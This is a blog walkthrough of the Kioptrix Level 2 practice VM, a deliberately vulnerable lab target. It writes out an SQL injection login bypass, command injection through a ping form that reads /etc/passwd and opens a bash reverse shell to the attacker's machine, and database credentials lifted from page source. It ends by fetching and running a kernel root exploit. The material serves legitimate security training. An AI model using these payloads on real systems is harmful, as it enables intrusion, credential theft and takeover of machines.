Sunday, November 3, 2013

Kioptrix Level 2 - Walkthrough

So, Level 1 was way too easy, Level 2 was a little bit trickier, but also not hard. I found it more interesting. Let's see:

The detailed NMAP scan results were the following:

root@kali:~# nmap -sS -A 192.168.1.19

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 08:15 CET
Nmap scan report for 192.168.1.19
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            623/udp  status
|_  100024  1            626/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2013-11-03T04:05:56+00:00; -3h09m48s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:91:C9:95 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.19

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds

Again, I went for the webserver again (I don't hate webservers or something :)). This time I got to an interesting webpage (on L1 it was only a default HTML). It was a login page, and I tried a simple SQL injection - from the NMAP scan I knew the server is running mysql, so that helped. I used:

admin' OR 1=1 #


and it let me in, and I got a page, where I could execute ping command.


As the output of the command looked like a system output, I thought that I could append other commands to it, in order to execute arbitrary commands. It turned out that I was right, and I could read files, or even open a reverse shell back to my computer. Some nice tricks to get rshell:


Commands used on the page:

192.168.1.1;cat /etc/passwd
192.168.1.1;bash -i >& /dev/tcp/192.168.1.17/4444 0>&1



After getting a shell on the victim, I saw that I was running with "apache" privileges.

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.19] 32771
bash: no job control in this shellbash-3.00$
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ pwd
/var/www/html
bash-3.00$ uname -r
2.6.9-55.EL

Before I got root, I did some enumeration (most important!!!), and could reveal some interesting stuff - it didn't lead to a root account, but still was good.

From the webpage source I could retrieve a myslq login password:

bash-3.00$ cat index.php
<?php
    mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
(...)

I could login to mysql, but my shell, wasn't fully interactive, so I executed a one line python script in order to make it fully interactive:

python -c 'import pty;pty.spawn("/bin/sh")'

bash-3.00$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.00$ mysql -u john -p
mysql -u john -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22969 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

mysql> select * from user;
select * from user;
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| Host                  | User | Password         | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| localhost             | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             | john | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
5 rows in set (0.00 sec)

mysql> exit
exit
Bye
sh-3.00$ mysql -u root -p
mysql -u root -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22971 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

As you can see above I could query the mysql user table. The password hash for root and john are the same, so knowing the password for john already gave me the root pw for the database.

This is nice, but I'm still not root (at least not on the system). After looking on the Linuy kernel version and making a quick Google search gave the exploit in first hit:

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

After downloading I copied it to the victim with wget, compiled and finally run it, and again, I got root.

sh-3.00$ uname -r
uname -r
2.6.9-55.EL
sh-3.00$ wget http://192.168.1.17/0x82-CVE-2009-2698.c
wget http://192.168.1.17/0x82-CVE-2009-2698.c
--01:33:26--  http://192.168.1.17/0x82-CVE-2009-2698.c
           => `0x82-CVE-2009-2698.c'
Connecting to 192.168.1.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

100%[====================================>] 2,645         --.--K/s            

01:33:26 (813.29 KB/s) - `0x82-CVE-2009-2698.c' saved [2645/2645]

sh-3.00$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)


I found this level more interesting, because of the special web application.

No comments: